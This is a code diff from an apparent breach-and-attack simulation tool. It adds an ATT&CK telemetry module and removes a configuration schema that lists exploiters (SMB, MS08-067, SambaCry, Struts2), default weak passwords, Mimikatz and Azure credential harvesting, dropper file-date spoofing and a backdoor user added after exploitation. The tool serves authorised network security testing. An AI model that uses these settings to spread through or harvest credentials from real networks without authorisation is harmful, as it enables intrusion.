|
||||||
|
__author__ = 'VakarisZ'
|
|
@ -0,0 +1,19 @@
|
||||||
|
"""
|
||||||
|
File that contains ATT&CK telemetry storing/retrieving logic
|
||||||
|
"""
|
||||||
|
import logging
|
||||||
|
from cc.database import mongo
|
||||||
|
|
||||||
|
__author__ = "VakarisZ"
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
def set_results(technique, data):
|
||||||
|
"""
|
||||||
|
Adds ATT&CK technique results(telemetry) to the database
|
||||||
|
:param technique: technique ID string e.g. T1110
|
||||||
|
:param data: Data, relevant to the technique
|
||||||
|
"""
|
||||||
|
data.update({'technique': technique})
|
||||||
|
mongo.db.attack_results.insert(data)
|
|
@ -4,870 +4,18 @@ import functools
|
||||||
import logging
|
import logging
|
||||||
from jsonschema import Draft4Validator, validators
|
from jsonschema import Draft4Validator, validators
|
||||||
from six import string_types
|
from six import string_types
|
||||||
|
import cc.services.post_breach_files
|
||||||
|
|
||||||
from cc.database import mongo
|
from cc.database import mongo
|
||||||
from cc.encryptor import encryptor
|
from cc.encryptor import encryptor
|
||||||
from cc.environment.environment import env
|
from cc.environment.environment import env
|
||||||
from cc.utils import local_ip_addresses
|
from cc.utils import local_ip_addresses
|
||||||
|
from config_schema import SCHEMA
|
||||||
|
|
||||||
__author__ = "itay.mizeretz"
|
__author__ = "itay.mizeretz"
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
WARNING_SIGN = u" \u26A0"
|
|
||||||
|
|
||||||
SCHEMA = {
|
|
||||||
"title": "Monkey",
|
|
||||||
"type": "object",
|
|
||||||
"definitions": {
|
|
||||||
"exploiter_classes": {
|
|
||||||
"title": "Exploit class",
|
|
||||||
"type": "string",
|
|
||||||
"anyOf": [
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"SmbExploiter"
|
|
||||||
],
|
|
||||||
"title": "SMB Exploiter"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"WmiExploiter"
|
|
||||||
],
|
|
||||||
"title": "WMI Exploiter"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"RdpExploiter"
|
|
||||||
],
|
|
||||||
"title": "RDP Exploiter (UNSAFE)"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"Ms08_067_Exploiter"
|
|
||||||
],
|
|
||||||
"title": "MS08-067 Exploiter (UNSAFE)"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"SSHExploiter"
|
|
||||||
],
|
|
||||||
"title": "SSH Exploiter"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"ShellShockExploiter"
|
|
||||||
],
|
|
||||||
"title": "ShellShock Exploiter"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"SambaCryExploiter"
|
|
||||||
],
|
|
||||||
"title": "SambaCry Exploiter"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"ElasticGroovyExploiter"
|
|
||||||
],
|
|
||||||
"title": "ElasticGroovy Exploiter"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"Struts2Exploiter"
|
|
||||||
],
|
|
||||||
"title": "Struts2 Exploiter"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"WebLogicExploiter"
|
|
||||||
],
|
|
||||||
"title": "Oracle Web Logic Exploiter"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"HadoopExploiter"
|
|
||||||
],
|
|
||||||
"title": "Hadoop/Yarn Exploiter"
|
|
||||||
}
|
|
||||||
]
|
|
||||||
},
|
|
||||||
"finger_classes": {
|
|
||||||
"title": "Fingerprint class",
|
|
||||||
"type": "string",
|
|
||||||
"anyOf": [
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"SMBFinger"
|
|
||||||
],
|
|
||||||
"title": "SMBFinger"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"SSHFinger"
|
|
||||||
],
|
|
||||||
"title": "SSHFinger"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"PingScanner"
|
|
||||||
],
|
|
||||||
"title": "PingScanner"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"HTTPFinger"
|
|
||||||
],
|
|
||||||
"title": "HTTPFinger"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"MySQLFinger"
|
|
||||||
],
|
|
||||||
"title": "MySQLFinger"
|
|
||||||
},
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"MSSQLFinger"
|
|
||||||
],
|
|
||||||
"title": "MSSQLFinger"
|
|
||||||
},
|
|
||||||
|
|
||||||
{
|
|
||||||
"type": "string",
|
|
||||||
"enum": [
|
|
||||||
"ElasticFinger"
|
|
||||||
],
|
|
||||||
"title": "ElasticFinger"
|
|
||||||
}
|
|
||||||
]
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"properties": {
|
|
||||||
"basic": {
|
|
||||||
"title": "Basic - Credentials",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"credentials": {
|
|
||||||
"title": "Credentials",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"exploit_user_list": {
|
|
||||||
"title": "Exploit user list",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
"Administrator",
|
|
||||||
"root",
|
|
||||||
"user"
|
|
||||||
],
|
|
||||||
"description": "List of usernames to use on exploits using credentials"
|
|
||||||
},
|
|
||||||
"exploit_password_list": {
|
|
||||||
"title": "Exploit password list",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
"Password1!",
|
|
||||||
"1234",
|
|
||||||
"password",
|
|
||||||
"12345678"
|
|
||||||
],
|
|
||||||
"description": "List of password to use on exploits using credentials"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"basic_network": {
|
|
||||||
"title": "Basic - Network",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"general": {
|
|
||||||
"title": "General",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"blocked_ips": {
|
|
||||||
"title": "Blocked IPs",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
],
|
|
||||||
"description": "List of IPs to not scan"
|
|
||||||
},
|
|
||||||
"local_network_scan": {
|
|
||||||
"title": "Local network scan",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description": "Determines whether the monkey should scan its subnets additionally"
|
|
||||||
},
|
|
||||||
"depth": {
|
|
||||||
"title": "Distance from island",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 2,
|
|
||||||
"description":
|
|
||||||
"Amount of hops allowed for the monkey to spread from the island. "
|
|
||||||
+ WARNING_SIGN
|
|
||||||
+ " Note that setting this value too high may result in the monkey propagating too far"
|
|
||||||
},
|
|
||||||
"subnet_scan_list": {
|
|
||||||
"title": "Scan IP/subnet list",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
],
|
|
||||||
"description":
|
|
||||||
"List of IPs/subnets the monkey should scan."
|
|
||||||
" Examples: \"192.168.0.1\", \"192.168.0.5-192.168.0.20\", \"192.168.0.5/24\""
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"network_analysis": {
|
|
||||||
"title": "Network Analysis",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"inaccessible_subnets": {
|
|
||||||
"title": "Network segmentation testing",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
],
|
|
||||||
"description":
|
|
||||||
"Test for network segmentation by providing a list of"
|
|
||||||
" subnets that should NOT be accessible to each other."
|
|
||||||
" For example, given the following configuration:"
|
|
||||||
" '10.0.0.0/24, 11.0.0.2/32, 12.2.3.0/24'"
|
|
||||||
" a Monkey running on 10.0.0.5 will try to access machines in the following"
|
|
||||||
" subnets: 11.0.0.2/32, 12.2.3.0/24."
|
|
||||||
" An alert on successful connections will be shown in the report"
|
|
||||||
" Additional subnet formats include: 13.0.0.1, 13.0.0.1-13.0.0.5"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"monkey": {
|
|
||||||
"title": "Monkey",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"general": {
|
|
||||||
"title": "General",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"alive": {
|
|
||||||
"title": "Alive",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description": "Is the monkey alive"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"behaviour": {
|
|
||||||
"title": "Behaviour",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"self_delete_in_cleanup": {
|
|
||||||
"title": "Self delete on cleanup",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": False,
|
|
||||||
"description": "Should the monkey delete its executable when going down"
|
|
||||||
},
|
|
||||||
"use_file_logging": {
|
|
||||||
"title": "Use file logging",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description": "Should the monkey dump to a log file"
|
|
||||||
},
|
|
||||||
"serialize_config": {
|
|
||||||
"title": "Serialize config",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": False,
|
|
||||||
"description": "Should the monkey dump its config on startup"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"system_info": {
|
|
||||||
"title": "System info",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"extract_azure_creds": {
|
|
||||||
"title": "Harvest Azure Credentials",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description":
|
|
||||||
"Determine if the Monkey should try to harvest password credentials from Azure VMs"
|
|
||||||
},
|
|
||||||
"collect_system_info": {
|
|
||||||
"title": "Collect system info",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description": "Determines whether to collect system info"
|
|
||||||
},
|
|
||||||
"should_use_mimikatz": {
|
|
||||||
"title": "Should use Mimikatz",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description": "Determines whether to use Mimikatz"
|
|
||||||
},
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"life_cycle": {
|
|
||||||
"title": "Life cycle",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"max_iterations": {
|
|
||||||
"title": "Max iterations",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 1,
|
|
||||||
"description": "Determines how many iterations of the monkey's full lifecycle should occur"
|
|
||||||
},
|
|
||||||
"victims_max_find": {
|
|
||||||
"title": "Max victims to find",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 30,
|
|
||||||
"description": "Determines the maximum number of machines the monkey is allowed to scan"
|
|
||||||
},
|
|
||||||
"victims_max_exploit": {
|
|
||||||
"title": "Max victims to exploit",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 7,
|
|
||||||
"description":
|
|
||||||
"Determines the maximum number of machines the monkey"
|
|
||||||
" is allowed to successfully exploit. " + WARNING_SIGN
|
|
||||||
+ " Note that setting this value too high may result in the monkey propagating to "
|
|
||||||
"a high number of machines"
|
|
||||||
},
|
|
||||||
"timeout_between_iterations": {
|
|
||||||
"title": "Wait time between iterations",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 100,
|
|
||||||
"description":
|
|
||||||
"Determines for how long (in seconds) should the monkey wait between iterations"
|
|
||||||
},
|
|
||||||
"retry_failed_explotation": {
|
|
||||||
"title": "Retry failed exploitation",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description":
|
|
||||||
"Determines whether the monkey should retry exploiting machines"
|
|
||||||
" it didn't successfuly exploit on previous iterations"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"internal": {
|
|
||||||
"title": "Internal",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"general": {
|
|
||||||
"title": "General",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"singleton_mutex_name": {
|
|
||||||
"title": "Singleton mutex name",
|
|
||||||
"type": "string",
|
|
||||||
"default": "{2384ec59-0df8-4ab9-918c-843740924a28}",
|
|
||||||
"description":
|
|
||||||
"The name of the mutex used to determine whether the monkey is already running"
|
|
||||||
},
|
|
||||||
"keep_tunnel_open_time": {
|
|
||||||
"title": "Keep tunnel open time",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 60,
|
|
||||||
"description": "Time to keep tunnel open before going down after last exploit (in seconds)"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"classes": {
|
|
||||||
"title": "Classes",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"scanner_class": {
|
|
||||||
"title": "Scanner class",
|
|
||||||
"type": "string",
|
|
||||||
"default": "TcpScanner",
|
|
||||||
"enum": [
|
|
||||||
"TcpScanner"
|
|
||||||
],
|
|
||||||
"enumNames": [
|
|
||||||
"TcpScanner"
|
|
||||||
],
|
|
||||||
"description": "Determines class to scan for machines. (Shouldn't be changed)"
|
|
||||||
},
|
|
||||||
"finger_classes": {
|
|
||||||
"title": "Fingerprint classes",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"$ref": "#/definitions/finger_classes"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
"SMBFinger",
|
|
||||||
"SSHFinger",
|
|
||||||
"PingScanner",
|
|
||||||
"HTTPFinger",
|
|
||||||
"MySQLFinger",
|
|
||||||
"MSSQLFinger",
|
|
||||||
"ElasticFinger"
|
|
||||||
],
|
|
||||||
"description": "Determines which classes to use for fingerprinting"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"kill_file": {
|
|
||||||
"title": "Kill file",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"kill_file_path_windows": {
|
|
||||||
"title": "Kill file path on Windows",
|
|
||||||
"type": "string",
|
|
||||||
"default": "%windir%\\monkey.not",
|
|
||||||
"description": "Path of file which kills monkey if it exists (on Windows)"
|
|
||||||
},
|
|
||||||
"kill_file_path_linux": {
|
|
||||||
"title": "Kill file path on Linux",
|
|
||||||
"type": "string",
|
|
||||||
"default": "/var/run/monkey.not",
|
|
||||||
"description": "Path of file which kills monkey if it exists (on Linux)"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"dropper": {
|
|
||||||
"title": "Dropper",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"dropper_set_date": {
|
|
||||||
"title": "Dropper sets date",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description":
|
|
||||||
"Determines whether the dropper should set the monkey's file date to be the same as"
|
|
||||||
" another file"
|
|
||||||
},
|
|
||||||
"dropper_date_reference_path_windows": {
|
|
||||||
"title": "Dropper date reference path (Windows)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "%windir%\\system32\\kernel32.dll",
|
|
||||||
"description":
|
|
||||||
"Determines which file the dropper should copy the date from if it's configured to do"
|
|
||||||
" so on Windows (use fullpath)"
|
|
||||||
},
|
|
||||||
"dropper_date_reference_path_linux": {
|
|
||||||
"title": "Dropper date reference path (Linux)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "/bin/sh",
|
|
||||||
"description":
|
|
||||||
"Determines which file the dropper should copy the date from if it's configured to do"
|
|
||||||
" so on Linux (use fullpath)"
|
|
||||||
},
|
|
||||||
"dropper_target_path_linux": {
|
|
||||||
"title": "Dropper target path on Linux",
|
|
||||||
"type": "string",
|
|
||||||
"default": "/tmp/monkey",
|
|
||||||
"description": "Determines where should the dropper place the monkey on a Linux machine"
|
|
||||||
},
|
|
||||||
"dropper_target_path_win_32": {
|
|
||||||
"title": "Dropper target path on Windows (32bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "C:\\Windows\\monkey32.exe",
|
|
||||||
"description": "Determines where should the dropper place the monkey on a Windows machine "
|
|
||||||
"(32bit)"
|
|
||||||
},
|
|
||||||
"dropper_target_path_win_64": {
|
|
||||||
"title": "Dropper target path on Windows (64bit)",
|
|
||||||
"type": "string",
|
|
||||||
"default": "C:\\Windows\\monkey64.exe",
|
|
||||||
"description": "Determines where should the dropper place the monkey on a Windows machine "
|
|
||||||
"(64 bit)"
|
|
||||||
},
|
|
||||||
"dropper_try_move_first": {
|
|
||||||
"title": "Try to move first",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description":
|
|
||||||
"Determines whether the dropper should try to move itsel instead of copying itself"
|
|
||||||
" to target path"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"logging": {
|
|
||||||
"title": "Logging",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"dropper_log_path_linux": {
|
|
||||||
"title": "Dropper log file path on Linux",
|
|
||||||
"type": "string",
|
|
||||||
"default": "/tmp/user-1562",
|
|
||||||
"description": "The fullpath of the dropper log file on Linux"
|
|
||||||
},
|
|
||||||
"dropper_log_path_windows": {
|
|
||||||
"title": "Dropper log file path on Windows",
|
|
||||||
"type": "string",
|
|
||||||
"default": "%temp%\\~df1562.tmp",
|
|
||||||
"description": "The fullpath of the dropper log file on Windows"
|
|
||||||
},
|
|
||||||
"monkey_log_path_linux": {
|
|
||||||
"title": "Monkey log file path on Linux",
|
|
||||||
"type": "string",
|
|
||||||
"default": "/tmp/user-1563",
|
|
||||||
"description": "The fullpath of the monkey log file on Linux"
|
|
||||||
},
|
|
||||||
"monkey_log_path_windows": {
|
|
||||||
"title": "Monkey log file path on Windows",
|
|
||||||
"type": "string",
|
|
||||||
"default": "%temp%\\~df1563.tmp",
|
|
||||||
"description": "The fullpath of the monkey log file on Windows"
|
|
||||||
},
|
|
||||||
"send_log_to_server": {
|
|
||||||
"title": "Send log to server",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description": "Determines whether the monkey sends its log to the Monkey Island server"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"exploits": {
|
|
||||||
"title": "Exploits",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"exploit_lm_hash_list": {
|
|
||||||
"title": "Exploit LM hash list",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"default": [],
|
|
||||||
"description": "List of LM hashes to use on exploits using credentials"
|
|
||||||
},
|
|
||||||
"exploit_ntlm_hash_list": {
|
|
||||||
"title": "Exploit NTLM hash list",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"default": [],
|
|
||||||
"description": "List of NTLM hashes to use on exploits using credentials"
|
|
||||||
},
|
|
||||||
"exploit_ssh_keys": {
|
|
||||||
"title": "SSH key pairs list",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"default": [],
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"description": "List of SSH key pairs to use, when trying to ssh into servers"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"cnc": {
|
|
||||||
"title": "Monkey Island",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"servers": {
|
|
||||||
"title": "Servers",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"command_servers": {
|
|
||||||
"title": "Command servers",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
"192.0.2.0:5000"
|
|
||||||
],
|
|
||||||
"description": "List of command servers to try and communicate with (format is <ip>:<port>)"
|
|
||||||
},
|
|
||||||
"internet_services": {
|
|
||||||
"title": "Internet services",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
"monkey.guardicore.com",
|
|
||||||
"www.google.com"
|
|
||||||
],
|
|
||||||
"description":
|
|
||||||
"List of internet services to try and communicate with to determine internet"
|
|
||||||
" connectivity (use either ip or domain)"
|
|
||||||
},
|
|
||||||
"current_server": {
|
|
||||||
"title": "Current server",
|
|
||||||
"type": "string",
|
|
||||||
"default": "192.0.2.0:5000",
|
|
||||||
"description": "The current command server the monkey is communicating with"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"exploits": {
|
|
||||||
"title": "Exploits",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"general": {
|
|
||||||
"title": "General",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"exploiter_classes": {
|
|
||||||
"title": "Exploits",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"$ref": "#/definitions/exploiter_classes"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
"SmbExploiter",
|
|
||||||
"WmiExploiter",
|
|
||||||
"SSHExploiter",
|
|
||||||
"ShellShockExploiter",
|
|
||||||
"SambaCryExploiter",
|
|
||||||
"ElasticGroovyExploiter",
|
|
||||||
"Struts2Exploiter",
|
|
||||||
"WebLogicExploiter",
|
|
||||||
"HadoopExploiter"
|
|
||||||
],
|
|
||||||
"description":
|
|
||||||
"Determines which exploits to use. " + WARNING_SIGN
|
|
||||||
+ " Note that using unsafe exploits may cause crashes of the exploited machine/service"
|
|
||||||
},
|
|
||||||
"skip_exploit_if_file_exist": {
|
|
||||||
"title": "Skip exploit if file exists",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": False,
|
|
||||||
"description": "Determines whether the monkey should skip the exploit if the monkey's file"
|
|
||||||
" is already on the remote machine"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"ms08_067": {
|
|
||||||
"title": "MS08_067",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"ms08_067_exploit_attempts": {
|
|
||||||
"title": "MS08_067 exploit attempts",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 5,
|
|
||||||
"description": "Number of attempts to exploit using MS08_067"
|
|
||||||
},
|
|
||||||
"ms08_067_remote_user_add": {
|
|
||||||
"title": "MS08_067 remote user",
|
|
||||||
"type": "string",
|
|
||||||
"default": "Monkey_IUSER_SUPPORT",
|
|
||||||
"description": "Username to add on successful exploit"
|
|
||||||
},
|
|
||||||
"ms08_067_remote_user_pass": {
|
|
||||||
"title": "MS08_067 remote user password",
|
|
||||||
"type": "string",
|
|
||||||
"default": "Password1!",
|
|
||||||
"description": "Password to use for created user"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"rdp_grinder": {
|
|
||||||
"title": "RDP grinder",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"rdp_use_vbs_download": {
|
|
||||||
"title": "Use VBS download",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description": "Determines whether to use VBS or BITS to download monkey to remote machine"
|
|
||||||
" (true=VBS, false=BITS)"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"sambacry": {
|
|
||||||
"title": "SambaCry",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"sambacry_trigger_timeout": {
|
|
||||||
"title": "SambaCry trigger timeout",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 5,
|
|
||||||
"description": "Timeout (in seconds) of SambaCry trigger"
|
|
||||||
},
|
|
||||||
"sambacry_folder_paths_to_guess": {
|
|
||||||
"title": "SambaCry folder paths to guess",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
'/',
|
|
||||||
'/mnt',
|
|
||||||
'/tmp',
|
|
||||||
'/storage',
|
|
||||||
'/export',
|
|
||||||
'/share',
|
|
||||||
'/shares',
|
|
||||||
'/home'
|
|
||||||
],
|
|
||||||
"description": "List of full paths to share folder for SambaCry to guess"
|
|
||||||
},
|
|
||||||
"sambacry_shares_not_to_check": {
|
|
||||||
"title": "SambaCry shares not to check",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "string"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
"IPC$", "print$"
|
|
||||||
],
|
|
||||||
"description": "These shares won't be checked when exploiting with SambaCry"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"smb_service": {
|
|
||||||
"title": "SMB service",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"smb_download_timeout": {
|
|
||||||
"title": "SMB download timeout",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 300,
|
|
||||||
"description":
|
|
||||||
"Timeout (in seconds) for SMB download operation (used in various exploits using SMB)"
|
|
||||||
},
|
|
||||||
"smb_service_name": {
|
|
||||||
"title": "SMB service name",
|
|
||||||
"type": "string",
|
|
||||||
"default": "InfectionMonkey",
|
|
||||||
"description": "Name of the SMB service that will be set up to download monkey"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"network": {
|
|
||||||
"title": "Network",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"tcp_scanner": {
|
|
||||||
"title": "TCP scanner",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"HTTP_PORTS": {
|
|
||||||
"title": "HTTP ports",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "integer"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
80,
|
|
||||||
8080,
|
|
||||||
443,
|
|
||||||
8008,
|
|
||||||
7001
|
|
||||||
],
|
|
||||||
"description": "List of ports the monkey will check if are being used for HTTP"
|
|
||||||
},
|
|
||||||
"tcp_target_ports": {
|
|
||||||
"title": "TCP target ports",
|
|
||||||
"type": "array",
|
|
||||||
"uniqueItems": True,
|
|
||||||
"items": {
|
|
||||||
"type": "integer"
|
|
||||||
},
|
|
||||||
"default": [
|
|
||||||
22,
|
|
||||||
2222,
|
|
||||||
445,
|
|
||||||
135,
|
|
||||||
3389,
|
|
||||||
80,
|
|
||||||
8080,
|
|
||||||
443,
|
|
||||||
8008,
|
|
||||||
3306,
|
|
||||||
9200,
|
|
||||||
7001
|
|
||||||
],
|
|
||||||
"description": "List of TCP ports the monkey will check whether they're open"
|
|
||||||
},
|
|
||||||
"tcp_scan_interval": {
|
|
||||||
"title": "TCP scan interval",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 200,
|
|
||||||
"description": "Time to sleep (in milliseconds) between scans"
|
|
||||||
},
|
|
||||||
"tcp_scan_timeout": {
|
|
||||||
"title": "TCP scan timeout",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 3000,
|
|
||||||
"description": "Maximum time (in milliseconds) to wait for TCP response"
|
|
||||||
},
|
|
||||||
"tcp_scan_get_banner": {
|
|
||||||
"title": "TCP scan - get banner",
|
|
||||||
"type": "boolean",
|
|
||||||
"default": True,
|
|
||||||
"description": "Determines whether the TCP scan should try to get the banner"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
},
|
|
||||||
"ping_scanner": {
|
|
||||||
"title": "Ping scanner",
|
|
||||||
"type": "object",
|
|
||||||
"properties": {
|
|
||||||
"ping_scan_timeout": {
|
|
||||||
"title": "Ping scan timeout",
|
|
||||||
"type": "integer",
|
|
||||||
"default": 1000,
|
|
||||||
"description": "Maximum time (in milliseconds) to wait for ping response"
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
